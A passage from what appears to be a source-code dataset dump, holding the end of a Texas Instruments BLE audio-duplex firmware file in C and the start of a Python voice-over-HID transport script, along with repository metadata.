Shift the buffer to acount for the seqNum hdr\n AudioDuplex_shiftEncodedBuffer(inBuffer,\n BLEAUDIO_MAX_NOTSIZE,\n AUDIO_DUPLEX_STREAM_TYPE_ADPCM);\n\n inBuffer[0] = seqNum++;\n // Send previous PV and SI\n inBuffer[1] = si_local;\n inBuffer[2] = LO_UINT16(pv_local);\n inBuffer[3] = HI_UINT16(pv_local);\n }\n\n AudioDuplex_transmitAudioFrame(inBuffer);\n\n // Release the buffer back to the I2S driver\n bufferRelease.bufferHandleIn = bufferRequest.bufferHandleIn;\n bufferRelease.bufferHandleOut = NULL;\n I2SCC26XX_releaseBuffer(i2sHandle, &bufferRelease);\n\n // Request the next buffer from I2S driver\n bufferRequest.buffersRequested = I2SCC26XX_BUFFER_IN;\n // Indicate that we request buffer from input stream\n gotBuffer = I2SCC26XX_requestBuffer(i2sHandle, &bufferRequest);\n }\n }\n }\n\n // Set the state vars to cleanup I2S streaming\n if (events & AUDIO_DUPLEX_STOP_I2S_EVENT)\n {\n AudioDuplex_stopI2Sstream();\n }\n\n // Send stop command, cleanup stream\n if (events & AUDIO_DUPLEX_SEND_STOP_CMD_EVENT)\n {\n AudioDuplex_sendStopCmd();\n }\n\n // Startup I2S sampling\n if (events & AUDIO_DUPLEX_START_I2S_EVENT)\n {\n AudioDuplex_startI2Sstream();\n }\n\n // Startup BLE Streaming\n if (events & AUDIO_DUPLEX_SEND_START_CMD_EVENT)\n {\n AudioDuplex_sendStartCmd();\n }\n\n // Handle error events from I2S driver\n if (events & AUDIO_DUPLEX_I2S_ERROR_EVENT)\n {\n Display_print0(hDisp, 4, 0, \"I2S Error Event\");\n\n // Move to stop state\n uint_least16_t hwiKey = Hwi_disable();\n streamVariables.streamType = AudioDuplex_send_stop_cmd;\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_SEND_STOP_CMD_EVENT);\n }\n Hwi_restore(hwiKey);\n }\n}\n\n/*********************************************************************\n * @fn AudioDuplex_processData\n *\n * @brief Process incoming audio data\n *\n * @return None\n */\nvoid AudioDuplex_processData(AudioDuplex_dataType data_type,\n AudioDuplex_audioData *pMsg)\n{\n static uint16_t prevSeqNum = 0xFFFF;\n static int numberOfPackets = 0, lostPackets = 0;\n static int msbcnumberOfPackets = 0, msbclostPackets = 0;\n\n // Check to see if notification is from audio data or control char\n if (data_type == AudioDuplex_data)\n {\n // If we have started the stream collect frames into a buffer\n if (streamVariables.streamType == AUDIO_DUPLEX_CMD_START)\n {\n // Check to see if a frame has been missed and report it\n if (((prevSeqNum + 1) & 0x00FF) != pMsg->pValue[0])\n {\n uint16_t curSeqNum = pMsg->pValue[0];\n uint8_t missedFrames = 0;\n if (pMsg->pValue[0] > prevSeqNum)\n {\n missedFrames = curSeqNum - prevSeqNum;\n }\n else\n {\n missedFrames = (curSeqNum + 256) - prevSeqNum;\n }\n\n numberOfPackets += missedFrames;\n lostPackets += missedFrames;\n Display_print2(hDisp, 5, 0, \"Missing frame, PER %d/%d\",\n lostPackets, numberOfPackets);\n }\n else\n {\n numberOfPackets++;\n }\n prevSeqNum = pMsg->pValue[0];\n }\n else if (streamVariables.streamType == AUDIO_DUPLEX_CMD_START_MSBC)\n {\n // Check to see if a frame has been missed and report it\n if (((prevSeqNum + 1) & 0x00FF) != pMsg->pValue[1])\n {\n uint16_t curSeqNum = pMsg->pValue[1];\n uint8_t missedFrames = 0;\n\n if (pMsg->pValue[1] > prevSeqNum)\n {\n missedFrames = curSeqNum - prevSeqNum;\n }\n else\n {\n missedFrames = (curSeqNum + 256) - prevSeqNum;\n }\n\n msbcnumberOfPackets += missedFrames;\n msbclostPackets += missedFrames;\n Display_print4(hDisp, 5, 0, \"Missing frame, PER %d/%d (%d vs %d)\",\n msbclostPackets, msbcnumberOfPackets,\n pMsg->pValue[1],\n prevSeqNum);\n }\n else\n {\n msbcnumberOfPackets++;\n }\n prevSeqNum = pMsg->pValue[1];\n }\n\n // If we have received a complete frame OTA decode it and send to I2S\n // for playback\n if (i2sStreamInProgress)\n {\n I2SCC26XX_BufferRequest bufferRequest;\n I2SCC26XX_BufferRelease bufferRelease;\n bufferRequest.buffersRequested = I2SCC26XX_BUFFER_OUT;\n // Indicate that we request buffer from output stream\n bool gotBuffer = I2SCC26XX_requestBuffer(i2sHandle, &bufferRequest);\n if (gotBuffer)\n {\n // Call codec specific decode fxns\n if (streamVariables.streamType == AUDIO_DUPLEX_CMD_START_MSBC)\n {\n sbc_decode(&sbc, pMsg->pValue, AUDIO_DUPLEX_MSBC_ENCODED_SIZE,\n (int16_t *)bufferRequest.bufferOut,\n streamVariables.samplesPerFrame * sizeof(int16_t),\n &written);\n }\n else\n {\n streamVariables.pv_rx = BUILD_UINT16(pMsg->pValue[2],\n pMsg->pValue[3]);\n streamVariables.si_rx = pMsg->pValue[1];\n Codec1_decodeBuff((int16_t *)bufferRequest.bufferOut,\n (uint8_t *)&pMsg->pValue[4],\n streamVariables.samplesPerFrame * sizeof(int16_t),\n &streamVariables.si_rx, &streamVariables.pv_rx);\n }\n\n // Send the buffer to the BoosterPack\n bufferRelease.bufferHandleOut = bufferRequest.bufferHandleOut;\n bufferRelease.bufferHandleIn = NULL;\n I2SCC26XX_releaseBuffer(i2sHandle, &bufferRelease);\n }\n }\n }\n else if (data_type == AudioDuplex_start_stop)\n {\n // Audio/Voice commands are 1B in length\n if(AUDIOPROFILE_CMD_LEN == pMsg->len)\n {\n // If we received a stop command reset the SI, PV\n if(AUDIO_DUPLEX_CMD_START == *(pMsg->pValue))\n {\n if (streamVariables.streamType != AUDIO_DUPLEX_CMD_STOP)\n {\n Display_print0(hDisp, 5, 0, \"Already started stream\");\n }\n else\n {\n // We received a start command for ADPCM, start the stream\n AudioDuplex_startStreaming(AUDIO_DUPLEX_STREAM_TYPE_ADPCM);\n\n Display_print0(hDisp, 5, 0, \"ADPCM Stream\");\n }\n }\n else if(AUDIO_DUPLEX_CMD_START_MSBC == *(pMsg->pValue))\n {\n if (streamVariables.streamType != AUDIO_DUPLEX_CMD_STOP)\n {\n Display_print0(hDisp, 5, 0, \"Already started stream\");\n }\n else\n {\n // We received a start command for MSBC, start the stream\n AudioDuplex_startStreaming(AUDIO_DUPLEX_STREAM_TYPE_MSBC);\n // Initialize encoder\n sbc_init_msbc(&sbc, 0);\n Display_print0(hDisp, 5, 0, \"mSBC Stream\");\n }\n }\n else if(AUDIO_DUPLEX_CMD_STOP == *(pMsg->pValue))\n {\n\n if(streamVariables.streamType != AUDIO_DUPLEX_STREAM_TYPE_NONE)\n {\n Display_print0(hDisp, 5, 0, \"Received Stop, sending stop\");\n prevSeqNum = 0xFFFF;\n AudioDuplex_stopStreaming();\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Received Stop, re-starting\");\n prevSeqNum = 0xFFFF;\n AudioDuplex_startStreaming(streamVariables.requestedStreamType);\n }\n }\n }\n }\n}\n\n/*********************************************************************\n * @fn AudioDuplex_startStreaming\n *\n * @brief Starts streaming audio to connected device\n *\n * @param requestedStreamType - The type of stream to start:\n * - AUDIO_DUPLEX_STREAM_TYPE_ADPCM\n * - AUDIO_DUPLEX_STREAM_TYPE_MSBC\n *\n * @return None.\n */\nvoid AudioDuplex_startStreaming(uint8_t requestedStreamType)\n{\n // Do stream state logic\n if (streamVariables.streamState == AudioDuplex_stream_idle)\n {\n // Start stream, from IDLE\n streamVariables.streamType = requestedStreamType;\n\n if(requestedStreamType == AUDIO_DUPLEX_STREAM_TYPE_MSBC)\n {\n streamVariables.samplesPerFrame = AUDIO_DUPLEX_MSBC_SAMPLES_PER_FRAME;\n streamVariables.notificationsPerFrame = BLEAUDIO_NUM_NOT_PER_FRAME_MSBC;\n streamVariables.requestedStreamType = AUDIO_DUPLEX_STREAM_TYPE_MSBC;\n }\n else\n {\n streamVariables.samplesPerFrame = AUDIO_DUPLEX_ADPCM_SAMPLES_PER_FRAME;\n streamVariables.notificationsPerFrame = BLEAUDIO_NUM_NOT_PER_FRAME_ADPCM;\n streamVariables.requestedStreamType = AUDIO_DUPLEX_STREAM_TYPE_ADPCM;\n\n }\n\n streamVariables.numOfFramesToBuffer = I2SCC26XX_QUEUE_SIZE;\n streamVariables.rfFrameSize = BLEAUDIO_MAX_NOTSIZE;\n Audio_SetAudioDataLen(streamVariables.rfFrameSize);\n\n streamVariables.requestedStreamState = AudioDuplex_stream_active;\n streamVariables.maxVolume = streamVariables.maxVolume;\n }\n else if(streamVariables.streamType != requestedStreamType &&\n requestedStreamType != AudioDuplex_stream_idle)\n {\n AudioDuplex_stopStreaming();\n\n // Start stream, from IDLE\n streamVariables.requestedStreamType = requestedStreamType;\n return;\n }\n else\n {\n // Stop stream\n streamVariables.requestedStreamType = AUDIO_DUPLEX_STREAM_TYPE_NONE;\n streamVariables.requestedStreamState = AudioDuplex_stream_idle;\n // Start chain of events to stop stream\n AudioDuplex_stopStreaming();\n return;\n }\n\n // Increase TX power during stream\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_5_DBM);\n\n i2sHandle = AudioDuplex_openI2S();\n\n if (i2sHandle != NULL)\n {\n Display_print1(hDisp, 5, 0, \"Opened I2S: %d samples/frame\",\n streamVariables.samplesPerFrame);\n // Move to send start command\n streamVariables.streamState = AudioDuplex_send_start_cmd;\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_SEND_START_CMD_EVENT);\n }\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Failed to opened I2S\");\n // Return, or move to IDLE state\n streamVariables.streamState = AudioDuplex_stream_idle;\n }\n}\n\n/*********************************************************************\n * @fn AudioDuplex_stopStreaming\n *\n * @brief Close and cleanup audio stream\n *\n * @param None.\n *\n * @return None.\n */\nvoid AudioDuplex_stopStreaming(void)\n{\n streamVariables.requestedStreamState = AudioDuplex_send_stop_cmd;\n streamVariables.streamState = AudioDuplex_send_stop_cmd;\n // Start chain of events to stop stream\n AudioDuplex_sendStopCmd();\n\n // Turn output volume back down\n volume = 0;\n AudioCodecSpeakerVolCtrl(AUDIO_CODEC_TI_3254, AUDIO_DUPLEX_OUTPUT_OPTION, volume);\n // Volume control\n AudioCodecMicVolCtrl(AUDIO_CODEC_TI_3254, AUDIO_DUPLEX_INPUT_OPTION, volume);\n\n if (streamVariables.streamType == AUDIO_DUPLEX_CMD_START_MSBC)\n {\n sbc_finish(&sbc);\n }\n\n if (i2sHandle != NULL)\n {\n I2SCC26XX_close(i2sHandle);\n Display_print0(hDisp, 5, 0, \"Closed I2S driver\");\n\n if (audio_decoded)\n {\n audio_decoded = NULL;\n Display_print0(hDisp, 5, 0, \"Free'd memory for I2S driver\");\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Failed to free memory for I2S driver\");\n }\n if (i2sContMgtBuffer)\n {\n i2sContMgtBuffer = NULL;\n }\n\n // Re-enable the instruction cache\n AudioDuplex_enableCache();\n }\n\n streamVariables.streamType = AUDIO_DUPLEX_CMD_STOP;\n streamVariables.streamState = AudioDuplex_stream_idle;\n Display_print0(hDisp, 5, 0, \"No Stream\");\n}\n\n/*********************************************************************\n * @fn AudioDuplex_sendStartCmd\n *\n * @brief Sends a start command to connected device\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_sendStartCmd(void)\n{\n // Check that we're in the correct state\n if (streamVariables.streamState == AudioDuplex_send_start_cmd)\n {\n uint8_t startCmd = streamVariables.streamType;\n uint8_t retVal = Audio_SetParameter(AUDIOPROFILE_START,\n AUDIOPROFILE_CMD_LEN,\n &startCmd);\n if (retVal == SUCCESS)\n {\n Display_print0(hDisp, 5, 0, \"Sent Start Cmd, initializing encoder\");\n if (streamVariables.streamType == AUDIO_DUPLEX_STREAM_TYPE_MSBC)\n {\n // Initialize encoder\n sbc_init_msbc(&sbc, 0);\n }\n else\n {\n // Initialize encoder\n streamVariables.pv = 0;\n streamVariables.si = 0;\n }\n // Try next state\n streamVariables.streamState = AudioDuplex_start_I2S;\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_START_I2S_EVENT);\n }\n }\n else\n {\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_SEND_START_CMD_EVENT);\n }\n }\n }\n else\n {\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_START_I2S_EVENT);\n }\n }\n\n}\n\n/*********************************************************************\n * @fn AudioDuplex_sendStopCmd\n *\n * @brief Sends a stop command to connected device\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_sendStopCmd(void)\n{\n // Check that we're in the correct state\n if (streamVariables.streamState == AudioDuplex_send_stop_cmd)\n {\n uint8_t retVal = SUCCESS;\n\n if (linkDB_Up(audioConnectionHandle))\n {\n uint8_t stopCmd = AUDIO_DUPLEX_CMD_STOP;\n retVal = Audio_SetParameter(AUDIOPROFILE_START, AUDIOPROFILE_CMD_LEN,\n &stopCmd);\n if (retVal == SUCCESS)\n {\n // Reset TX power\n // Move to stop I2S stream\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_0_DBM);\n streamVariables.streamState = AudioDuplex_stop_I2S;\n AudioDuplex_stopI2Sstream();\n }\n else\n {\n Display_print1(hDisp, 5, 0, \"Failed to send STOP: %d\", retVal);\n // Try again\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_SEND_STOP_CMD_EVENT);\n }\n }\n }\n else\n {\n // Reset TX power\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_0_DBM);\n // Move to stop I2S stream\n streamVariables.streamState = AudioDuplex_stop_I2S;\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_STOP_I2S_EVENT);\n }\n }\n }\n else\n {\n // Try next state\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_STOP_I2S_EVENT);\n }\n }\n}\n\n/*********************************************************************\n * @fn AudioDuplex_startI2Sstream\n *\n * @brief Start I2S stream\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_startI2Sstream(void)\n{\n // Check that we're in the correct state\n if (streamVariables.streamState == AudioDuplex_start_I2S)\n {\n if (streamVariables.requestedStreamState == AudioDuplex_stream_active)\n {\n // It's now safe to update audio data length\n Audio_SetAudioDataLen(streamVariables.rfFrameSize);\n // Try to start I2S stream\n i2sStreamInProgress = I2SCC26XX_startStream(i2sHandle);\n if (i2sStreamInProgress)\n {\n // Move to ACTIVE as we have completed start sequence\n streamVariables.streamState = AudioDuplex_stream_active;\n\n if (streamVariables.streamType == AUDIO_DUPLEX_STREAM_TYPE_MSBC)\n {\n Display_print0(hDisp, 5, 0, \"mSBC Stream Started\");\n }\n else if (streamVariables.streamType == AUDIO_DUPLEX_STREAM_TYPE_ADPCM)\n {\n Display_print0(hDisp, 5, 0, \"ADPCM Stream Started\");\n }\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Failed to start I2S stream\");\n }\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Started stream when Active was not requested\");\n }\n }\n}\n\n/*********************************************************************\n * @fn AudioDuplex_stopI2Sstream\n *\n * @brief Stop I2S stream\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_stopI2Sstream(void)\n{\n // Check that we're in the correct state\n if (streamVariables.streamState == AudioDuplex_stop_I2S)\n {\n // Try to stop I2S stream\n if (I2SCC26XX_stopStream(i2sHandle))\n {\n Display_print0(hDisp, 5, 0, \"Stopped I2S stream\");\n i2sStreamInProgress = false;\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Failed to stop I2S stream\");\n }\n }\n else\n {\n Display_print1(hDisp, 5, 0, \"Tried to stop I2S stream in state %d\",\n streamVariables.streamState);\n }\n}\n\nstatic I2SCC26XX_Handle AudioDuplex_openI2S(void)\n{\n I2SCC26XX_Handle i2sHandleTmp = NULL;\n // Allocate memory for decoded PCM data\n i2sParams.ui32conMgtBufTotalSize = I2S_BLOCK_OVERHEAD_IN_BYTES * \\\n streamVariables.numOfFramesToBuffer\\\n * 2;\n\n i2sParams.ui32conBufTotalSize = sizeof(int16_t) * (streamVariables.samplesPerFrame * \\\n streamVariables.numOfFramesToBuffer \\\n * 2);\n\n // Disable instruction cache to use for audio buffers\n AudioDuplex_disableCache();\n i2sContMgtBuffer = (uint8_t *)(I2S_MEM_BASE + I2S_BUF + 1);\n audio_decoded = (int16_t *)I2S_MEM_BASE;\n\n if (audio_decoded)\n {\n // Setup I2S Params\n i2sParams.blockSize = streamVariables.samplesPerFrame;\n i2sParams.pvContBuffer = (void *) audio_decoded;\n i2sParams.pvContMgtBuffer = (void *) i2sContMgtBuffer;\n\n // Reset I2S handle and attempt to open\n i2sHandle = (I2SCC26XX_Handle)&(I2SCC26XX_config);\n i2sHandleTmp = I2SCC26XX_open(i2sHandle, &i2sParams);\n\n volume = streamVariables.maxVolume;\n }\n else\n {\n Display_print0(hDisp, 5, 0, \"Failed to allocate mem for I2S\");\n if (i2sContMgtBuffer)\n {\n i2sContMgtBuffer = NULL;\n }\n }\n\n AudioCodecSpeakerVolCtrl(AUDIO_CODEC_TI_3254, AUDIO_DUPLEX_OUTPUT_OPTION, volume);\n // Volume control\n AudioCodecMicVolCtrl(AUDIO_CODEC_TI_3254, AUDIO_DUPLEX_INPUT_OPTION, volume);\n\n return (i2sHandleTmp);\n}\n\n/*********************************************************************\n * @fn AudioDuplex_transmitAudioFrame\n *\n * @brief Transmits processed audio frame to connected device\n *\n * @param buf - pointer to PDM buffer\n *\n * @return None.\n */\nstatic bStatus_t AudioDuplex_transmitAudioFrame(uint8_t *buf)\n{\n bStatus_t notiStatus = SUCCESS;\n if(linkDB_Up(audioConnectionHandle))\n {\n // Send streamVariables.notificationsPerFrame GATT notifications for every audio frame\n for (int i = 0; i < streamVariables.notificationsPerFrame; )\n {\n notiStatus = Audio_SetParameter(AUDIOPROFILE_AUDIO, streamVariables.rfFrameSize, buf);\n if (notiStatus == SUCCESS)\n {\n // Move on to next section of audio frame\n buf += streamVariables.rfFrameSize;\n i++;\n }\n else\n {\n // Return the error immediately\n return(notiStatus);\n }\n }\n\n }\n else\n {\n notiStatus = FAILURE;\n }\n\n return(notiStatus);\n}\n\n/*********************************************************************\n * @fn AudioDuplex_shiftEncodedBuffer\n *\n * @brief Shifts an encoded buffer to include headers for RF\n * This is used to prevent double copying\n *\n * @param encodedBuf - The encoded buffer for copying\n * @param len - length of input buffer\n * @param streamType - Type of stream, determines how much to shift\n *\n * @return None.\n */\nstatic void AudioDuplex_shiftEncodedBuffer(uint8_t *encodedBuf, uint8_t len,\n uint8_t streamType)\n{\n uint8_t hdrSize = 0;\n\n if(streamType == AUDIO_DUPLEX_STREAM_TYPE_ADPCM)\n {\n hdrSize = AUDIO_DUPLEX_HDRSIZE_ADPCM;\n }\n else if (streamType == AUDIO_DUPLEX_STREAM_TYPE_ADPCM)\n {\n hdrSize = AUDIO_DUPLEX_HDRSIZE_MSBC;\n }\n else\n {\n // Assume unencoded buffer, return\n return;\n }\n\n // Shift the buffer based on stream type\n for( int16_t index = ( len - 1 ) ; index >= hdrSize ; index-- )\n {\n encodedBuf[index] = encodedBuf[index - hdrSize];\n }\n}\n\n/*********************************************************************\n * @fn AudioDuplex_disableCache\n *\n * @brief Disables the instruction cache and sets power constaints\n * This prevents the device from sleeping while streaming\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_disableCache()\n{\n uint_least16_t hwiKey = Hwi_disable();\n Power_setConstraint(PowerCC26XX_SB_VIMS_CACHE_RETAIN);\n Power_setConstraint(PowerCC26XX_NEED_FLASH_IN_IDLE);\n VIMSModeSafeSet(VIMS_BASE, VIMS_MODE_DISABLED, true);\n Hwi_restore(hwiKey);\n}\n\n/*********************************************************************\n * @fn AudioDuplex_enableCache\n *\n * @brief Enables the instruction cache and releases power constaints\n * Allows device to sleep again\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_enableCache()\n{\n uint_least16_t hwiKey = Hwi_disable();\n Power_releaseConstraint(PowerCC26XX_SB_VIMS_CACHE_RETAIN);\n Power_releaseConstraint(PowerCC26XX_NEED_FLASH_IN_IDLE);\n VIMSModeSafeSet(VIMS_BASE, VIMS_MODE_ENABLED, true);\n Hwi_restore(hwiKey);\n}\n\n/*********************************************************************\n * @fn AudioDuplex_i2sCallbackFxn\n *\n * @brief Callback functtion from I2S driver, sets events to be\n * processed in the task context\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AudioDuplex_i2sCallbackFxn(I2SCC26XX_Handle handle,\n I2SCC26XX_StreamNotification *notification)\n{\n if (notification->status == I2SCC26XX_STREAM_ERROR)\n {\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_I2S_ERROR_EVENT);\n }\n }\n else if (notification->status == I2SCC26XX_STREAM_BUFFER_READY)\n {\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_I2S_FRAME_EVENT);\n }\n }\n else if (notification->status == I2SCC26XX_STREAM_BUFFER_READY_BUT_NO_AVAILABLE_BUFFERS)\n {\n if(appAudioCB != NULL)\n {\n // Notify the Application of the event\n (*appAudioCB)(AUDIO_DUPLEX_I2S_FRAME_EVENT);\n }\n }\n}\n\n/*********************************************************************\n*********************************************************************/\n"
},
{
"alpha_fraction": 0.5150375962257385,
"alphanum_fraction": 0.5355601906776428,
"avg_line_length": 36.3870964050293,
"blob_id": "83c1ac238192ec948aa6bdccc46f56e0684e59ca",
"content_id": "1bfe12b497dbef5d077b31decf548c43f1183687",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16226,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 434,
"path": "/tools/scripts/voice/transport/hidtransport.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "\"\"\"\n/*\n * Filename: hidlegacy.py\n *\n * Description: Voice over HID over GATT with the legacy HID service\n *\n * Copyright (C) 2017 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\"\"\"\n\nfrom .transport import TransportBase\nimport logging\nimport pywinusb.hid as hid\nfrom struct import pack\nfrom time import sleep\nimport time\n\n\nclass HIDTransport(object):\n\n \"\"\"\n This set must be overridden by any derived classes!!\n This set should contain a list of all report_ids for which required for the voice HID reports\n \"\"\"\n _VENDOR_IDS = set([])\n\n def __init__(self, callback, vendor_id=None, product_id=None):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info(\"Init\")\n\n \"\"\" Designate all instance variables \"\"\"\n self.product_id = None\n self.vendor_id = None\n self.hid_device = None\n\n \"\"\" Apply values as defined by the instance \"\"\"\n self.__hid_callbackFxn = callback\n self.setHIDFilter(vendor_id, product_id)\n\n def setHIDFilter(self, vendor_id, product_id):\n self.logger.info(\"Setting Vendor ID: 0x%04X\" % vendor_id)\n self.vendor_id = vendor_id\n self.logger.info(\"Setting Product ID: 0x%04X\" % product_id)\n self.product_id = product_id\n return\n\n def __findSupportedDevices(self, devices):\n targetdevice = None\n\n for device in devices:\n #print(device)\n device.open()\n\n \"\"\" Find all report IDs in this device \"\"\"\n report_ids = list()\n input_reports = device.find_input_reports()\n for report in input_reports:\n report_ids.append(report.report_id)\n\n #print(report_ids)\n \"\"\" If we have all the report IDs required, then we found the device we need to talk with \"\"\"\n if self._VENDOR_IDS.issubset(report_ids):\n targetdevice = device\n device.close()\n break\n\n device.close()\n\n self.logger.debug(\"Found these devices: \")\n self.logger.debug(targetdevice)\n self.hid_device = targetdevice\n return\n\n def open(self):\n devices = hid.HidDeviceFilter(vendor_id=self.vendor_id,\n product_it=self.product_id).get_devices()\n\n self.__findSupportedDevices(devices)\n if self.hid_device is not None:\n self.hid_device.open()\n self.hid_device.set_raw_data_handler(self.__hid_callbackFxn)\n self.logger.info(\"Opened\")\n return True\n else:\n self.logger.info(\"Could not open!\")\n return False\n\n def close(self):\n if self.hid_device is not None:\n self.logger.info(\"Closed\")\n self.hid_device.close()\n\n def isConnected(self):\n if self.hid_device is not None:\n return self.hid_device.is_plugged()\n return False\n\n\nclass HIDLegacy(HIDTransport, TransportBase):\n\n _VENDOR_IDS = set([3])\n\n _START_REPORT = [4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n _STOP_REPORT = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n _SEQUENCE_ORDER = ( 1, 9, 17, 25, 33, 41, 49, 57, 65, 73,\n 81, 89, 97, 105, 113, 121, 129, 137, 145, 153,\n 161, 169, 177, 185, 193, 201, 209, 217, 225, 233,\n 241, 249)\n\n class Event(object):\n Start = \"Start\"\n Stop = \"Stop\"\n Data = \"Data\"\n\n def __init__(self, callbackFunction, vendor_id=None, product_id=None):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info(\"Init\")\n\n HIDTransport.__init__(self,\n callback=self._callback,\n vendor_id=vendor_id,\n product_id=product_id)\n\n self._callbackFxn = callbackFunction\n self._audioData = bytearray()\n self._frameCnt = 0\n self._checkData = False\n self._state = HIDLegacy.Event.Stop\n self._sequenceIndex = 1\n return\n\n def _callback(self, data):\n #self.logger.debug(\"HID Callback: Data: %s\" % data)\n\n if data[1:21] == HIDLegacy._START_REPORT:\n self.logger.info(\"Start\")\n\n if self._checkData:\n self.__sequenceIndex = 1\n if self._state is not HIDLegacy.Event.Stop:\n self.logger.error(\"Received \\\"Start\\\" while in \\\"%s\\\" state!\" % self._state)\n\n self._state = HIDLegacy.Event.Start\n\n self._frameCnt = 0\n self._audioData = b''\n\n elif data[1:21] == HIDLegacy._STOP_REPORT:\n self.logger.info(\"Stop\")\n\n if self._checkData:\n if self._state is not HIDLegacy.Event.Data:\n self.logger.error(\"Received \\\"Data\\\" while in \\\"%s\\\" state!\" % self._state)\n if self._frameCnt != 0:\n self.logger.error(\"Received \\\"Stop\\\" without having all of the audio frames!\")\n\n self._state = HIDLegacy.Event.Stop\n\n \"\"\" Perform supplied application function callback\"\"\"\n if self._callbackFxn is not None:\n self._callbackFxn(self._audioData)\n\n else:\n self.logger.debug(\"Data[%d]\" % self._frameCnt)\n\n if self._checkData:\n if self._state is HIDLegacy.Event.Start and self._frameCnt != 0:\n self.logger.warn(\"Received \\\"Data\\\" where frameCnt is \\\"%d\\\"\" % self._frameCnt)\n\n self._state = HIDLegacy.Event.Data\n\n if self._frameCnt == 0:\n self.logger.debug(\"%s\" % data)\n\n \"\"\" Experimental check for lost voice frames; not yet validated! \"\"\"\n if self._checkData:\n if data[1] is not HIDLegacy._SEQUENCE_ORDER[self._sequenceIndex]:\n for i, x in enumerate(HIDLegacy._SEQUENCE_ORDER):\n if x == data[1]:\n self.logger.debug(\"Found pair: %d, %d\" % (i, x))\n self.logger.debug(\"Expected pair: %d, %d\" % (self._sequenceIndex, HIDLegacy._SEQUENCE_ORDER[self._sequenceIndex]))\n\n if i > self._sequenceIndex:\n delta = i - self._sequenceIndex\n else:\n delta = i + len(HIDLegacy._SEQUENCE_ORDER) - self._sequenceIndex\n\n self.logger.warn(\"Dropped %d voice frame(s)\" % delta)\n self._sequenceIndex = i\n self.logger.debug(\"Setting index to %d; delta found %d\" % (self._sequenceIndex, delta))\n break\n\n self._sequenceIndex += 1\n if self._sequenceIndex == len(HIDLegacy._SEQUENCE_ORDER):\n self._sequenceIndex = 0\n\n it = iter(data[5:21])\n for x in it:\n self._audioData += pack('B', x)\n else:\n it = iter(data[1:21])\n for x in it:\n self._audioData += pack('B', x)\n\n self._frameCnt += 1\n if self._frameCnt == 5:\n self._frameCnt = 0\n\n\n def setDataValidation(self, boolean):\n self._checkData = boolean\n\n\nclass HIDVoHoGP(HIDTransport, TransportBase):\n\n HID_RPT_ID_VOICE_START_IN = 10\n 